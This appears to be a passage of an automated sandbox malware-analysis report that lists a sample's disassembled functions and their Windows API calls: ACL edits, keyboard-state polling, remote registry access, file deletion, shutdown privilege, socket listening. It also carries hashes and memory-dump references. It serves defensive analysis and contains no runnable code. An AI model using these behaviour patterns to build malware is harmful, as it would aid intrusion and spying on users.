                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008E7DB1
                                                                        • GetLengthSid.ADVAPI32(?), ref: 008E7DCE
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008E7DDD
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 008E7DE4
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008E7E05
                                                                        • CopySid.ADVAPI32(00000000), ref: 008E7E0C
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008E7E3D
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E7E63
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E7E77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: e2b2b9502f63a260f67a4198651eeefa820fc98edbdfccdb3c7fd1bede2680b2
                                                                        • Instruction ID: c20cc1e22be297e6c547482384c90c8e3251d473e41ef045ecdaf1357e3239d3
                                                                        • Opcode Fuzzy Hash: e2b2b9502f63a260f67a4198651eeefa820fc98edbdfccdb3c7fd1bede2680b2
                                                                        • Instruction Fuzzy Hash: 53615D71A0424AEFEF01DFA5DC44AEEBB79FF09700F048269E915E6291DB319E05DB60
                                                                        Function 008FA1EF Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 102fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008FA20F
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 008FA26E
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008FA293
                                                                        • _memset.LIBCMT ref: 008FA2B2
                                                                        • _wcsncpy.LIBCMT ref: 008FA2EE
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008FA323
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008FA32E
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 008FA337
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008FA341
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 3670377745-3457252023
                                                                        • Opcode ID: 5f7592f7c29a8ab3727d1887683ff8e47bcbb5b89a71875b1145b5568f8c18e0
                                                                        • Instruction ID: fedb149d582e989c7309d73476ca4337b3c2f027ac0b0667a92e4327a5b2c8de
                                                                        • Opcode Fuzzy Hash: 5f7592f7c29a8ab3727d1887683ff8e47bcbb5b89a71875b1145b5568f8c18e0
                                                                        • Instruction Fuzzy Hash: 43319FB160410DABDB209FA4DC49FEB37BCFF89750F1041B6FA08D2260EA7096458B25
                                                                        Function 008A66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                        • API String ID: 0-4052911093
                                                                        • Opcode ID: a68a8ba3bf803e92e3ca0c537159b6de4a83c00f7392631c4f797f7bcfe9c252
                                                                        • Instruction ID: 0af1226d8602fbcdb849fefbba3dc9c91d468c617867c57901636d7932e2bf3f
                                                                        • Opcode Fuzzy Hash: a68a8ba3bf803e92e3ca0c537159b6de4a83c00f7392631c4f797f7bcfe9c252
                                                                        • Instruction Fuzzy Hash: 0A729171E00219DBDF24CF59C8847AEB7B5FF49314F14816AE909EB694EB349D81CB90
                                                                        Function 008F001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 008F0097
                                                                        • SetKeyboardState.USER32(?), ref: 008F0102
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 008F0122
                                                                        • GetKeyState.USER32(000000A0), ref: 008F0139
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 008F0168
                                                                        • GetKeyState.USER32(000000A1), ref: 008F0179
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 008F01A5
                                                                        • GetKeyState.USER32(00000011), ref: 008F01B3
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 008F01DC
                                                                        • GetKeyState.USER32(00000012), ref: 008F01EA
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 008F0213
                                                                        • GetKeyState.USER32(0000005B), ref: 008F0221
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: c4517f576748b98da35926d34796e6d24b7178a487b0a6d2b19b77a640e83cee
                                                                        • Instruction ID: 72dcde66688f0dad9a7d42d88dbdca0b46ac708aaa4b7bb0bf7c75a31967ce70
                                                                        • Opcode Fuzzy Hash: c4517f576748b98da35926d34796e6d24b7178a487b0a6d2b19b77a640e83cee
                                                                        • Instruction Fuzzy Hash: 7051CA2090478C5DFB35DBB489547FABFB5EF01380F08459996C59A1C3DA649A8CCF62
                                                                        Function 009103DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00910E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009104AC
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0091054B
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009105E3
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00910822
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0091082F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow
                                                                        • String ID:
                                                                        • API String ID: 2014801545-0
                                                                        • Opcode ID: e72e6d3f4060d5d44aa54a46a1c475b8c994be0133c410b9897ce12726dc9a27
                                                                        • Instruction ID: 9ce6255aea90c111dd4d14d848e7b2c5a58ed1ab2be4ab1ce8f729ebceff0994
                                                                        • Opcode Fuzzy Hash: e72e6d3f4060d5d44aa54a46a1c475b8c994be0133c410b9897ce12726dc9a27
                                                                        • Instruction Fuzzy Hash: 4FE16131604204AFCB14DF28C895E6ABBE9FF89314F04896DF44ADB261D771ED41CB92
                                                                        Function 008FC75C Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 280timefileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008FC78D
                                                                        • FindClose.KERNEL32(00000000), ref: 008FC7E1
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008FC806
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008FC81D
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 008FC844
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileTime$FindLocal$CloseFirstSystem_memmove
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 2127821509-2428617273
                                                                        • Opcode ID: fa66bfcfaa5e01542275637b1b982a1c68e67c073db02959f768f9451d01801e
                                                                        • Instruction ID: 3eabdec3aef3932d8f117358a1bea0084e61da0ee361da33e8528cb8b8b6a968
                                                                        • Opcode Fuzzy Hash: fa66bfcfaa5e01542275637b1b982a1c68e67c073db02959f768f9451d01801e
                                                                        • Instruction Fuzzy Hash: 2EA11DB1518209ABDB00FBA8C995DAFB7ECFF95704F44092DF595C6151EA30EA08CB63
                                                                        Function 00904164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: bd9c563860d8f26bd676d031c56fec9fc06ba314b913fb527bf94158c92c5e22
                                                                        • Instruction ID: dcb39267ba9d8d77344ef36a832e67565ec8ed34b1ee7c5eb0e944ddbb3dd54a
                                                                        • Opcode Fuzzy Hash: bd9c563860d8f26bd676d031c56fec9fc06ba314b913fb527bf94158c92c5e22
                                                                        • Instruction Fuzzy Hash: 2A21E2753142189FDB00AF28DC19BAD7BA8FF55351F04C029FA5ADB2A1DB70AC00DB85
                                                                        Function 008F37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                          • Part of subcall function 008F4A31: GetFileAttributesW.KERNEL32(?,008F370B), ref: 008F4A32
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008F38A3
                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008F394B
                                                                        • MoveFileW.KERNEL32(?,?), ref: 008F395E
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008F397B
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F399D
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008F39B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 4002782344-1173974218
                                                                        • Opcode ID: c13b01ca14aa07452e239b1b68c414ec09d8a0e9e4bd59d5029ebbb0f729e238
                                                                        • Instruction ID: a8a9d1b890518423ffa54b7d91f58eae53bd052dda1e3c125c1c67e221f173ba
                                                                        • Opcode Fuzzy Hash: c13b01ca14aa07452e239b1b68c414ec09d8a0e9e4bd59d5029ebbb0f729e238
                                                                        • Instruction Fuzzy Hash: F7517A3190514DAACF06FBB8DA929FDBB78FF11300F644069E406F6191EB616F09CB62
                                                                        Function 008FF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008FF440
                                                                        • Sleep.KERNEL32(0000000A), ref: 008FF470
                                                                        • _wcscmp.LIBCMT ref: 008FF484
                                                                        • _wcscmp.LIBCMT ref: 008FF49F
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 008FF53D
                                                                        • FindClose.KERNEL32(00000000), ref: 008FF553
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                        • String ID: *.*
                                                                        • API String ID: 713712311-438819550
                                                                        • Opcode ID: 3228741fc988bc7eb1f66574bfd706a93079077705672e16e1ae16a398957d9d
                                                                        • Instruction ID: ee0315f2efa603115ff107efaefe0f79cbd8905ef5634ecb0d582ed19542095e
                                                                        • Opcode Fuzzy Hash: 3228741fc988bc7eb1f66574bfd706a93079077705672e16e1ae16a398957d9d
                                                                        • Instruction Fuzzy Hash: BF416D7190420EABCF14EF78DC55AFEBBB4FF09314F144466EA19E2291EB309A44CB51
                                                                        Function 008A5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 1e6f0b60c4a4b89712e27a657018006d04a53eb8ddc9713e98c706616220f5e9
                                                                        • Instruction ID: f0b34321d243b4a73c73686a374c50600d9832423228c0188b8bc587cb553105
                                                                        • Opcode Fuzzy Hash: 1e6f0b60c4a4b89712e27a657018006d04a53eb8ddc9713e98c706616220f5e9
                                                                        • Instruction Fuzzy Hash: 15129B70A00A0ADFDF14DFA9D981AEEB7F5FF49300F144529E806EB250EB35A951CB51
                                                                        Function 008F3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                          • Part of subcall function 008F4A31: GetFileAttributesW.KERNEL32(?,008F370B), ref: 008F4A32
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008F3B89
                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 008F3BD9
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F3BEA
                                                                        • FindClose.KERNEL32(00000000), ref: 008F3C01
                                                                        • FindClose.KERNEL32(00000000), ref: 008F3C0A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 2649000838-1173974218
                                                                        • Opcode ID: f3b25d13af7b78d294b5f638a545a2b3f968406e6fc2bf7bdea5275bc821968d
                                                                        • Instruction ID: 523021f40be8ddd370680e85672d7eedae2bd90ac52d2618b48affd05c1f475f
                                                                        • Opcode Fuzzy Hash: f3b25d13af7b78d294b5f638a545a2b3f968406e6fc2bf7bdea5275bc821968d
                                                                        • Instruction Fuzzy Hash: 27316D3101D3899BC701FB68D8A58BFB7A8FE91314F444D2DF4E6D2191EB219A09D763
                                                                        Function 008F51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
                                                                          • Part of subcall function 008E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
                                                                          • Part of subcall function 008E87E1: GetLastError.KERNEL32 ref: 008E8865
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 008F51F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: b33f32dd1df0925a765484159443503acd17584cc318035092fb73e28d7f5070
                                                                        • Instruction ID: ba157210efa3fbf0bd9956bcd2dbdb36899e624756471696a3ac166d200f3504
                                                                        • Opcode Fuzzy Hash: b33f32dd1df0925a765484159443503acd17584cc318035092fb73e28d7f5070
                                                                        • Instruction Fuzzy Hash: 24014E317A5A1D6BF72862789C9BFFB7258FB05344F200625FB17E20D2DB711C0185A1
                                                                        Function 00906283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009062DC
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009062EB
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00906307
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00906316
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00906330
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00906344
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: d05a9103322d1d15d755a8280beee3266153a66c0a6c174bab3fe0e25141a2cd
                                                                        • Instruction ID: 692f45f24f09a1c0860fb1dbdc724f0289544057c5d58d60a25ee48ed281afe8
                                                                        • Opcode Fuzzy Hash: d05a9103322d1d15d755a8280beee3266153a66c0a6c174bab3fe0e25141a2cd
                                                                        • Instruction Fuzzy Hash: CE219C317002149FCB10EF68C856B6EB7A9EF49720F148169E866E72D1CB70AD11DB92
                                                                        Function 008A5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008B0DB6: std::exception::exception.LIBCMT ref: 008B0DEC
                                                                          • Part of subcall function 008B0DB6: __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                        • _memmove.LIBCMT ref: 008E0258
                                                                        • _memmove.LIBCMT ref: 008E036D
                                                                        • _memmove.LIBCMT ref: 008E0414
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1300846289-0
                                                                        • Opcode ID: d63e5867a533ad2f295fe9594841347dbb7b078020e883eeea38bb43cfa57240
                                                                        • Instruction ID: 2988a2629af7935f2c007bc1ca141362c9e1a87ce4eb7b61d8a778f07323f06e
                                                                        • Opcode Fuzzy Hash: d63e5867a533ad2f295fe9594841347dbb7b078020e883eeea38bb43cfa57240
                                                                        • Instruction Fuzzy Hash: C902CE70A00209DFDF04DF69D981AAEBBB5FF45300F148469E80AEB395EB75D990CB91
                                                                        Function 0089192B Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefDlgProcW.USER32(?,?), ref: 008919FA
                                                                          • Part of subcall function 00891290: DefDlgProcW.USER32(?,00000020,?), ref: 008912D8
                                                                        • GetSysColor.USER32(0000000F), ref: 00891A4E
